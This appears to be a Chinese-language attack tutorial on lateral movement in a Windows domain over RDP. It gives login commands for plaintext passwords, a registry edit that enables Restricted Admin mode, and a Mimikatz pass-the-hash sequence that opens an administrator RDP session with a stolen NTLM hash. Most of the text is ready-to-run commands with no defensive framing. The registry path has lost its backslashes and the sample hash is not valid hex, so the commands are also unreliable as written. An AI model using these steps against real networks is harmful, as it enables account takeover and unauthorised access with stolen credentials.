域横向移动RDP传递-Mimikatz
除了上述讲到的IPC,WMI,SMB等协议的连接外,获取到的明文密码或HASH密文也可以通过RDP协议进行连接操作。
注:RDP就相当于linux里的ssh,远程连接协议,linux的ssh就相当于是windows的rdp协议,也就是常说的3389端口。
RDP明文密码连接
mstsc.exe /console /v:192.168.3.21 /admin
rdesktop 192.168.3.21:3389
RDP密文HASH连接
windows Server需要开启Restricted Admin mode,在windows 8.1和windows Server 2012R2中默认开启,同时如果Win 7和Windows Server 2008 R2安装了2871997/2973351补丁也支持;开启命令:
REG ADD “HKLMSystemCurrentControlSetControlLsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
开启后运行:
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208sdlfkjssdlfksj “/run:mstsc.exe/restrictedadmin”
